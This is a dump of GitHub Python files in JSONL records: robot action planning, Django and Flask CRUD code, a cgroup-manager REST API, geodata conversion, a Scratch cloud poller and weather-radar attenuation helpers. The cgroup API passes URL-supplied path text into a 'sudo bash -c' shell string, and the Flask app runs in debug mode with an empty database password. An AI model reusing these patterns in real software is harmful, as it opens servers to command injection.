size=n_random)\nrandom_y = np.random.uniform(low=0, high=1, size=n_random)\n\n#%%\n# Calculate the proportion of samples below unnormalized pdf\n# ----------------------------------------------------------\n\ncount_under = 0\nindices_under = []\nindices_above = []\nfor i in range(n_random):\n if random_y[i] lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Push'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Push'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Push'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Push')\n\n if mate_predict_kl > lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Mate'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Mate'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Mate'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Mate')\n\n # print('search_KL_divergance: ', search_KL_divergance)\n # print('search_action_dict: ', search_action_dict)\n # exit()\n\n def insert_queue(KL_action_pair: list, KL_action_queue: list):\n cur_KL_divergances = []\n for pair in KL_action_queue:\n cur_KL_divergances.append(pair[0])\n cur_KL_divergances = np.array(cur_KL_divergances)\n insert_index = np.sum(KL_action_pair[0] > cur_KL_divergances)\n KL_action_queue.insert(insert_index, KL_action_pair)\n\n return\n\n lower_KL_action_queue = []\n higher_KL_action_queue = []\n best_action_pair = None\n\n for i in range(0, search_level):\n\n level = '{}_level'.format(i)\n\n for KL_index, KL_divergance in enumerate(search_KL_divergance[level]):\n\n KL_action_pair = [KL_divergance, search_action_dict[level][KL_index]]\n\n if KL_divergance < lower_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=lower_KL_action_queue)\n\n elif KL_divergance < higher_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=higher_KL_action_queue)\n\n if not len(lower_KL_action_queue) == 0:\n best_action_pair = lower_KL_action_queue[0]\n break\n\n predicted_probs = []\n\n if best_action_pair is None and not len(higher_KL_action_queue) == 0:\n best_action_pair = higher_KL_action_queue[0]\n\n if len(lower_KL_action_queue) == 0 and len(higher_KL_action_queue) == 0:\n return None, [], [], {}\n\n if len(best_action_pair[1]) == 0:\n return 'End', ['End'], [], {}\n else:\n plan = copy.deepcopy(best_action_pair[1])\n plan_copy = copy.deepcopy(plan)\n while len(plan_copy):\n for key, value in search_action_dict.items():\n if plan_copy in value:\n predicted_probs.append(search_levels_dict[key][value.index(plan_copy)])\n plan_copy.pop()\n predicted_probs.reverse()\n plan.append('End')\n\n for index, action in enumerate(plan):\n if action != 'End':\n action_prob_dict[action.lower()] = predicted_probs[index]\n\n return plan[0], plan, predicted_probs, action_prob_dict\n\n\ndef find_end_state_distribution():\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n for state in ending:\n vector_index_options = np.where(image_labels_test == state)[0]\n summation = np.zeros((cluster_center_num))\n for index in vector_index_options:\n summation = latent_vec_2_cluster_proba(latent_vectors_test[index, :]) + summation\n\n end_state_distibution = summation / np.sum(summation)\n np.save(file_path(file_name=end_state_distribution_npy, file_path=False, split=None), end_state_distibution)\n return end_state_distibution\n\n\ndef plan_test(end_state_distribution: np.ndarray=None):\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='test'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='test'))\n\n latent_vectors_train = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_train = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n # eval_data_distribution(image_labels_test, latent_vectors_test)\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n if isinstance(end_state_distribution, np.ndarray):\n goal_proba = end_state_distribution\n\n elif end_state_distribution is None:\n goal_proba = np.load(file_path(file_name=end_state_distribution_npy, file_path=True, split=None))\n\n # goal_proba =np.array([0, 1, 0, 0], dtype=np.float32)\n # print('goal_proba: ', goal_proba)\n # print('latent_vectors_test: ', latent_vectors_test.shape)\n # print('image_labels_test: ', image_labels_test.shape)\n \n average_vectors = {}\n for i in np.unique(image_labels_test):\n i_indices = np.where(image_labels_test == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_test[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('test average_vectors: ', average_vectors)\n\n average_vectors = {}\n for i in np.unique(image_labels_train):\n i_indices = np.where(image_labels_train == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_train[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('train average_vectors: ', average_vectors)\n\n # exit()\n\n success_num = 0\n first_success_num = 0\n test_num = 330\n tested_indices = []\n\n sequences_test_num = {}\n sequences_test_success_num = {}\n sequences_test_first_success_num = {}\n\n bar = Bar('Processing', max=test_num)\n for _ in range(test_num):\n while True:\n rand_index = np.random.randint(latent_vectors_test.shape[0])\n\n initial_label = image_labels_test[rand_index]\n cur_label = copy.deepcopy(initial_label)\n # if not cur_label == 3:\n # continue\n\n cur_latent_vector = latent_vectors_test[rand_index, :]\n\n if not rand_index in tested_indices:\n break\n tested_indices.append(rand_index)\n\n Groundtruth_plan = groundtruth_plan[action_type[initial_label]]\n initial_plan = None\n executed_plan = []\n if not action_type[initial_label] in list(sequences_test_num.keys()):\n sequences_test_num[action_type[initial_label]] = 1\n sequences_test_success_num[action_type[initial_label]] = 0\n sequences_test_first_success_num[action_type[initial_label]] = 0\n\n sequences_test_num[action_type[initial_label]] += 1\n\n loop_times = 0\n while True:\n proba = latent_vec_2_cluster_proba(cur_latent_vector)\n # test = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print(len(test))\n predicted_action, plan, _, _ = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print('cur_label: ', list(action_type.values())[int(cur_label)])\n # print('plan: ', plan)\n # print('#'*50)\n\n if not plan is None and initial_plan is None:\n initial_plan = copy.deepcopy(plan)\n if not predicted_action is None:\n executed_plan.append(predicted_action)\n\n if predicted_action == 'End' or predicted_action is None:\n break\n\n cur_label, cur_latent_vector = simulate_action(cur_label=cur_label,\n action=predicted_action,\n latent_vectors=latent_vectors_test,\n image_labels=image_labels_test)\n loop_times += 1\n if loop_times > 5:\n break\n # exit()\n # print('executed_plan: ', executed_plan)\n # print('initial_plan: ', initial_plan)\n # print('Groundtruth_plan: ', Groundtruth_plan)\n # exit()\n\n if initial_plan == executed_plan and initial_plan in Groundtruth_plan:\n sequences_test_first_success_num[action_type[initial_label]] += 1\n first_success_num += 1\n\n if cur_label in ending and not predicted_action is None:\n sequences_test_success_num[action_type[initial_label]] += 1\n success_num += 1\n bar.next()\n bar.finish()\n print('success rate: ', success_num / test_num)\n print('first success rate: ', first_success_num / test_num)\n print('#' * 50)\n for key, value in sequences_test_num.items():\n print('value: ', value)\n test_num_temp = value\n test_success_num_temp = sequences_test_success_num[key]\n test_first_success_num_temp = sequences_test_first_success_num[key]\n\n print('test num: ', value)\n print('success num: ', test_success_num_temp)\n print('first success num: ', test_first_success_num_temp)\n\n print('{} success rate: '.format(key), test_success_num_temp / test_num_temp)\n print('{} first success rate: '.format(key), test_first_success_num_temp / test_num_temp)\n\n return plan\n\n\ndef simulate_action(cur_label, action, latent_vectors, image_labels):\n\n Dynamic = {'Push': Push_dynamic, 'Mate': Mate_dynamic}\n next_labels = np.where(Dynamic[action][int(cur_label), :] == 1)[0]\n\n vector_index_options = np.where(image_labels == next_labels)[0]\n rand_vector_index = np.random.choice(vector_index_options)\n next_label = image_labels[rand_vector_index]\n next_laten_vector = latent_vectors[rand_vector_index, :]\n\n return next_label, next_laten_vector\n\n\ndef predict_proba(init_proba: np.ndarray):\n\n assert init_proba.shape[0] == cluster_center_num\n\n A = np.zeros((label_num, label_num))\n A_push = np.zeros((label_num, label_num))\n A_mate = np.zeros((label_num, label_num))\n A_self = np.eye(label_num)\n\n for push in Push:\n A[push[0], push[1]] = 1\n A_push[push[0], push[1]] = 1\n\n for mate in Mate:\n A[mate[0], mate[1]] = 1\n A_mate[mate[0], mate[1]] = 1\n\n for self_ in Self:\n A[self_[0], self_[1]] = 1\n for self_ in Push_self:\n A_push[self_[0], self_[1]] = 1\n for self_ in Mate_self:\n A_mate[self_[0], self_[1]] = 1\n\n A = normalize(A, axis=1, norm='l1')\n A_push = normalize(A_push, axis=1, norm='l1')\n A_mate = normalize(A_mate, axis=1, norm='l1')\n # print('A_push: ', np.where(A_push==1))\n # print('A_mate: ', np.where(A_mate==1))\n\n\n init_cluster_prob = init_proba\n\n init_cluster_prob /= np.sum(init_cluster_prob)\n\n P = np.zeros((cluster_center_num, cluster_center_num))\n\n P_purity_num = np.load(file_path(file_name=label_nums_npy, file_path=True, split=None))\n P_purity_num = P_purity_num.astype(int)\n\n P_purity_col_norm = normalize(P_purity_num, axis=0, norm='l1')\n P_purity_row_norm = normalize(P_purity_num, axis=1, norm='l1')\n np.set_printoptions(precision=3, suppress=True)\n # print('P_purity_col_norm: ', P_purity_col_norm)\n # print('P_purity_row_norm: ', P_purity_row_norm)\n # print('P_purity_num: ', P_purity_num)\n\n action_prob = {'Push': 0, 'Mate': 0}\n P_push = np.zeros((cluster_center_num, cluster_center_num))\n P_mate = np.zeros((cluster_center_num, cluster_center_num))\n\n for i in range(P.shape[0]):\n for j in range(P.shape[1]):\n P_entry = 0\n\n P_entry_push = 0\n P_entry_mate = 0\n for m in range(P_purity_row_norm.shape[1]):\n for n in range(P_purity_row_norm.shape[1]):\n P_entry += P_purity_row_norm[i, m] * A[m, n] * P_purity_col_norm[j, n]\n\n P_entry_push += P_purity_row_norm[i, m] * A_push[m, n] * P_purity_col_norm[j, n]\n P_entry_mate += P_purity_row_norm[i, m] * A_mate[m, n] * P_purity_col_norm[j, n]\n\n P[i, j] = P_entry\n\n P_push[i, j] = P_entry_push\n P_mate[i, j] = P_entry_mate\n\n P_succesor = init_cluster_prob @ P\n\n P_succesor_mate = init_cluster_prob @ P_mate\n P_succesor_push = init_cluster_prob @ P_push\n\n # print('P: ', P)\n # print('#'*25)\n # print('P_mate: ', P_mate)\n # print('P_push: ', P_push)\n # print('P_self: ', P_self)\n\n # print('init_cluster_prob: ', init_cluster_prob)\n # print('P_succesor: ', P_succesor)\n # print('P_succesor_mate: ', P_succesor_mate)\n # print('P_succesor_push: ', P_succesor_push)\n # print('P_succesor_self: ', P_succesor_self)\n\n # print('P_succesor_mate: ', np.sum(P_succesor_mate))\n # print('P_succesor_push: ', np.sum(P_succesor_push))\n # print('P_succesor_self: ', np.sum(P_succesor_self))\n\n # # print('sum: ', P_succesor_mate+P_succesor_push+P_succesor_self)\n\n # print('P_succesor: ', np.sum(P_succesor))\n # print('#' * 50)\n # exit()\n\n return {'Push': P_succesor_push, 'Mate': P_succesor_mate}\n\n\nif __name__ == '__main__':\n end_state_distribution = find_end_state_distribution()\n plan = plan_test(end_state_distribution=None)\n print('plan: ', plan)","repo_name":"mingchen-sjtu/NeuralSymbol_AI","sub_path":"src/fmauch_universal_robot/ur_real_robot/VAE_detect/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10592973902","text":"from django.db import models\n\nclass ArmyShop(models.Model):\n year = models.IntegerField()\n month = models.IntegerField()\n type = models.TextField()\n name = models.TextField()\n\n class Meta:\n db_table = 'army_shop'\n managed = False\n\n# 1. 클래스\n# 2. 모델 상속\n# 3. 속성 => 변수 = OOOField 대입\nclass Course(models.Model):\n # Integer BigInteger\n name = models.CharField(max_length=30)\n cnt = models.IntegerField()","repo_name":"ggoreb/tutorial_aivle","sub_path":"secondapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27714783452","text":"#A shop will give discount of 10% if the cost of purchased quantity is more than 1000.\n#Ask user for quantity\n#Suppose, one unit will cost 100.\n#Judge and print total cost for user.\n\nq= int(input(\"ENTER QUANTITY\"))\ndis=0\ntotalcost=0\nif(q*100>1000) :\n dis=.10*q*100\n totalcost= q*100 - dis\nelse:\n totalcost = q*100\nprint(\"TOTAL COST IS =\",totalcost) ","repo_name":"axaxthu/CODING-HOME-PRACTICE","sub_path":"shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69951072807","text":"import os\nfrom subprocess import CalledProcessError, check_call\nfrom urllib.parse import unquote\n\nfrom cgroup_manager.cgroups.serializers import CgroupCreateSerializer, CgroupProcessAddSerializer\nfrom rest_framework.exceptions import NotFound, ValidationError\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_200_OK, HTTP_201_CREATED\n\ncgroup_path_prefix = \"/sys/fs/cgroup/\"\n\n\nclass CGroupProcessListAddAPIView(GenericAPIView):\n \"\"\"Lists tasks pids by cgroup. Raises 404 if cgroup does not exist. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n\n queryset = None\n\n def get(self, request, *args, **kwargs):\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n if not os.path.exists(path):\n raise NotFound()\n\n with open(path) as f:\n return Response(f.read().splitlines())\n\n def put(self, request, *args, **kwargs):\n \"\"\"Adds task to given cgroup. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n serializer = self.get_serializer_class()(data=request.data)\n serializer.is_valid(raise_exception=True)\n pid = str(serializer.validated_data[\"pid\"]) # otherwise check_call fails\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n try:\n check_call([\"sudo\", \"bash\", \"-c\", f\"echo {pid} >> {path}\"])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Adding process to cgroup failed. Please check hierarchy and cgroup name.\"]})\n\n return Response(serializer.data, status=HTTP_200_OK)\n\n def get_serializer_class(self):\n # otherwise swagger complains\n if self.request.method == \"PUT\":\n return CgroupProcessAddSerializer\n\n\nclass CgroupCreateAPIView(GenericAPIView):\n \"\"\"Create cgroup in given hierarchy\"\"\"\n\n queryset = None\n serializer_class = CgroupCreateSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n hierarchy = unquote(kwargs[\"hierarchy\"])\n cgroup_path_fragment = unquote(serializer.validated_data['cgroup_path_fragment'])\n path = os.path.join(cgroup_path_prefix, hierarchy, cgroup_path_fragment)\n try:\n check_call([\"sudo\", \"mkdir\", \"-p\", path])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Creating cgroup returned an error. Please check hierarchy and cgroup name.\"]})\n return Response(serializer.data, status=HTTP_201_CREATED)\n","repo_name":"jacoor/cgroup-manager","sub_path":"cgroup_manager/cgroups/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5426492592","text":"import geopandas\nimport os\n\n\n# shapefile转geojson: shapefile路径 geojson路径\ndef shp_to_geojson(shp_path, geoj_path):\n shp = geopandas.read_file(shp_path)\n shp.to_file(geoj_path, driver=\"GeoJSON\", encoding=\"utf-8\")\n\n\n# geojson转shapefile: geojson路径 shapefile路径\ndef geojson_to_shp(geoj_path, shp_path):\n geoj = geopandas.read_file(geoj_path)\n geoj.to_file(shp_path, driver=\"ESRI Shapefile\", encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n # ws = r'D:\\Work_PhD\\MISR_AHI_WS\\220210'\n # geoj = ws + '/AHI_view.json'\n # shp = ws + '/AHI_view.shp'\n # geojson_to_shp(geoj, shp)\n \n ws = r'D:\\Work_PhD\\MISR_AHI_WS\\221221'\n roi_name = '60.0_1'\n geoj = ws + '/ROIs_ex_json/' + roi_name + '.json'\n shp = ws + '/ROIs_ex_shp/' + roi_name + '_ex.shp'\n shp_to_geojson(shp, geoj)\n # # shp = ws + '/0_50_roi.shp'\n # # geojson_to_shp(geoj, shp)\n\n # ws_folder = r'D:\\Work_PhD\\MISR_AHI_WS\\220331'\n # geoj_folder = os.path.join(ws_folder, 'ROI')\n # shp_folder = os.path.join(ws_folder, 'ROI_shp')\n # if not os.path.exists(shp_folder):\n # os.makedirs(shp_folder)\n # geojs = os.listdir(geoj_folder)\n # for geoj_file in geojs:\n # roi_name = geoj_file.split('.')[0] + '.' + geoj_file.split('.')[1]\n # geoj_filename = os.path.join(geoj_folder, geoj_file)\n # shp_filename = os.path.join(shp_folder, roi_name + '.shp')\n # geojson_to_shp(geoj_filename, shp_filename)","repo_name":"Bosh0113/MISR_AHI","sub_path":"test/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5687801879","text":"import requests, time, json\nfrom ScraGet.Exceptions import ProjectNotFound, InvalidValue\nfrom threading import Thread\nfrom typing import Union\n\nheaders = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36\"}\n\nclass get_cloud_data:\n def __init__(self):\n pass\n \n def updateCloud(self, ID : Union[str,int], limit : Union[str,int]= \"10\", offset : Union[str,int]=\"0\") -> None:\n \"\"\"\n Requests to Scratch API for clouddata.\n\n **Params**:\\n\n `ID` - Mandatory. Put the project ID in *str* or *int* format.\\n\n `limit` - Optional (Default=10) Specify number of logs to be returned in *str* or *int* format.\\n\n `offset` - Optional (Default=0) Specify the offset for each log item in *str* or *int* format.\n \"\"\"\n info = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit={limit}&offset={offset}\")\n self.response_object = info\n self.response_time = info.elapsed.total_seconds()\n self.status_code = info.status_code\n \n if self.status_code == 200:\n info = info.json()\n self.cloud_data = info\n\n\nclass cloud:\n def __init__(self):\n self.stop = False\n \n def scan(self, ID: Union[str,int], delay: Union[float,int] = 1.0, NewThread: bool = True) -> None:\n \"\"\"\n Scans clouddata continuously every few seconds (duration to be defined by you while making the cloud class) for any changes.\n\n **Params**:\\n\n `ID` - Mandatory. Put project ID in *str* or *int* format.\\n\n `delay` - Optional(default=1.0). Put the time delay between 2 scan updates in *float* or *int* format. Minimum: 0.1 secs.\\n\n `NewThread` - Optional(default=True). Specify *True* if you need to run in a separate thread, specify *False* if you need to run in main thread. (*bool* format).\n \"\"\"\n\n \n def inner_dec(func):\n y = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n \n if y.status_code == 200:\n y = y.json()\n y = [json.dumps(item) for item in y]\n while True:\n time.sleep(delay)\n if self.stop:\n if NewThread:\n exit(0)\n break\n x = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n if x.status_code != 200: #can get 504\n continue\n x = x.json()\n\n x = [json.dumps(item) for item in x]\n if x != y:\n z = list(set(x) - set(y))\n z = [json.loads(item) for item in z]\n y = x\n self.change_log = z\n self.recent = z[0]\n self.user = z[0][\"user\"]\n self.type = z[0][\"verb\"]\n self.var = z[0][\"name\"]\n self.value = z[0][\"value\"]\n self.time = z[0][\"timestamp\"]\n func(self)\n\n else:\n raise ProjectNotFound(f\"Project with ID {ID} returned a status codes of: {y.status_code}\")\n\n def threaded_dec(func):\n scan_thread = Thread(target=inner_dec, args=(func,))\n scan_thread.setDaemon(True)\n scan_thread.start()\n self.thread = scan_thread\n\n if delay < 0.2:\n raise InvalidValue(\"Delay is less than 0.2. Try making the delay more than 0.2\")\n else:\n if NewThread:\n return threaded_dec\n return inner_dec\n","repo_name":"Quantum-Codes/ScraGet","sub_path":"ScraGet/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"73816174568","text":"n=int(input())\nif(n==1):\n print(n)\nelse:\n count=0\n for i in range(1, (n//2)+1):\n for j in range(i, n+1):\n if(i*j<=n):\n count=count+1\n else:\n break\n print(count)\n","repo_name":"RajathRD/competitive-coding","sub_path":"SPOJ/AE00.py","file_name":"AE00.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920928861","text":"import logging\nfrom typing import Optional\n\nlogger_initialized = {}\n\n\ndef get_logger(name: str,\n log_file: Optional[str] = None,\n log_level: int = logging.INFO,\n file_mode: str = 'w'):\n \"\"\"Initialize and get a logger by name.\n\n If the logger has not been initialized, this method will initialize the\n logger by adding one or two handlers, otherwise the initialized logger will\n be directly returned. During initialization, a StreamHandler will always be\n added. If `log_file` is specified, a FileHandler will also be added.\n Args:\n name (str): Logger name.\n log_file (str | None): The log filename. If specified, a FileHandler\n will be added to the logger.\n log_level (int): The logger level.\n file_mode (str): The file mode used in opening log file.\n Defaults to 'w'.\n Returns:\n logging.Logger: The expected logger.\n \"\"\"\n # use logger in mmengine if exist.\n try:\n from mmengine.logging import MMLogger\n if MMLogger.check_instance_created(name):\n logger = MMLogger.get_instance(name)\n else:\n logger = MMLogger.get_instance(\n name,\n log_file=log_file,\n log_level=log_level,\n file_mode=file_mode)\n return logger\n\n except Exception:\n pass\n\n logger = logging.getLogger(name)\n if name in logger_initialized:\n return logger\n # handle hierarchical names\n # e.g., logger \"a\" is initialized, then logger \"a.b\" will skip the\n # initialization since it is a child of \"a\".\n for logger_name in logger_initialized:\n if name.startswith(logger_name):\n return logger\n\n # handle duplicate logs to the console\n for handler in logger.root.handlers:\n if type(handler) is logging.StreamHandler:\n handler.setLevel(logging.ERROR)\n\n stream_handler = logging.StreamHandler()\n handlers = [stream_handler]\n\n if log_file is not None:\n # Here, the default behaviour of the official logger is 'a'. Thus, we\n # provide an interface to change the file mode to the default\n # behaviour.\n file_handler = logging.FileHandler(log_file, file_mode)\n handlers.append(file_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n for handler in handlers:\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n logger.addHandler(handler)\n\n logger.setLevel(log_level)\n logger_initialized[name] = True\n\n return logger\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/utils/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"39813951570","text":"def caesar(s, n):\n s = list(s)\n for i in range(len(s)):\n if s[i].isupper():\n s[i]=chr((ord(s[i])-ord('A')+ n)%26+ord('A'))\n elif s[i].islower():\n s[i]=chr((ord(s[i])-ord('a')+ n)%26+ord('a'))\n\n return \"\".join(s)\n # 주어진 문장을 암호화하여 반환하세요.","repo_name":"cwadven/algorism_programmers","sub_path":"Level1/시저 암호H/clean_answer.py","file_name":"clean_answer.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18351081787","text":"from flask import Flask, jsonify, request\n\nimport mysql.connector\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"banco\"\n)\n\napp = Flask(__name__)\n\n#Create\n@app.route('/api/notas', methods=['POST'])\ndef add_nota():\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"INSERT INTO notas (title, content) VALUES (%s, %s)\", (title, content))\n db.commit()\n return jsonify({'message': 'Nota adicionada com sucesso'})\n\n\n#Read\n@app.route('/api/notas', methods=['GET'])\ndef get_notas():\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM notas\")\n notas = cursor.fetchall()\n return jsonify(notas)\n\n#Update\n@app.route('/api/notas/', methods=['PUT'])\ndef update_nota(id):\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"UPDATE notas SET title=%s, content=%s WHERE id=%s\", (title, content, id))\n db.commit()\n return jsonify({'message': 'Nota atualizada com sucesso'})\n\n#Delete\n@app.route('/api/notas/', methods=['DELETE'])\ndef delete_nota(id):\n cursor = db.cursor()\n cursor.execute(\"DELETE FROM notas WHERE id=%s\", (id,))\n db.commit()\n return jsonify({'message': 'Nota deletada com sucesso'})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"RafaelM4gn/python-backend-studies","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11598993452","text":"import inspect\nimport wradlib as wlb\nfrom .utilities import do_call, str2numeric_dict_args\n\ndef calculate_pia_dict_args(radar, pia = None,\n dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F'):\n if pia is not None:\n if pia['use_pia']:\n if pia['pia_field'] in pia.keys():\n pia_args = pia[pia['pia_field']]\n pia_args = str2numeric_dict_args(pia_args)\n\n if pia['pia_field'] == 'dbz':\n args_constr = [k for k in pia_args.keys() if 'constraint' in k]\n if len(args_constr) > 0:\n args_pia = [k for k in pia_args.keys() if k not in args_constr]\n args_constr, pia_args = map(lambda keys: {x: pia_args[x] for x in keys}, [args_constr, args_pia])\n\n if args_constr['constraints'] == 'both':\n pia_args['constraints'] = [wlb.atten.constraint_dbz, wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']], [args_constr['constraint_args_pia']]]\n elif args_constr['constraints'] == 'dbz':\n pia_args['constraints'] = [wlb.atten.constraint_dbz]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']]]\n elif args_constr['constraints'] == 'pia':\n pia_args['constraints'] = [wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_pia']]]\n else:\n pia_args['constraints'] = None\n pia_args['constraint_args'] = None\n\n pia_args['dbz_field'] = dbz_field\n else:\n pia_args['kdp_field'] = kdp_field\n\n pia_args['pia_field'] = pia['pia_field']\n\n return calculate_pia(radar, **pia_args)\n else:\n return correct_attenuation(radar, pia_field = pia['pia_field'])\n else:\n return None\n else:\n return None\n\n# args_dbz = ['a_max', 'a_min', 'n_a', 'b_max', 'b_min', 'n_b', 'sector_thr',\n# 'constraint_args_dbz', 'constraint_args_pia']\n# num_dbz = [float, float, int, float, float, int, int, float, float]\n# for k in range(len(args_dbz)):\n# pia_args[args_dbz[k]] = num_dbz[k](pia_args[args_dbz[k]])\n\ndef calculate_pia(radar, **kwargs):\n args1 = inspect.getfullargspec(correct_attenuation).args[1:]\n args2 = inspect.getfullargspec(wlb.atten.correct_attenuation_constrained).args[1:]\n args3 = inspect.getfullargspec(wlb.atten.pia_from_kdp).args[1:]\n pia_args = args1 + args2 + args3\n\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n pia = do_call(correct_attenuation, args = [radar], kwargs = pia_kwargs)\n\n return pia\n\ndef correct_attenuation(radar, pia_field = 'dbz', dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F', **kwargs):\n # path-integrated attenuation\n # pia_field: 'dbz' or 'kdp'\n dr = radar.range['meters_between_gates']/1000\n\n if pia_field == 'dbz':\n dbz = radar.fields[dbz_field]['data']\n pia_fun = wlb.atten.correct_attenuation_constrained\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'gate_length' in kwargs:\n pia_kwargs['gate_length'] = dr\n pia = do_call(pia_fun, args = [dbz], kwargs = pia_kwargs)\n\n if pia_field == 'kdp':\n kdp = radar.fields[kdp_field]['data']\n pia_fun = wlb.atten.pia_from_kdp\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'dr' in kwargs:\n pia_kwargs['dr'] = dr\n pia = do_call(pia_fun, args = [kdp], kwargs = pia_kwargs)\n\n return 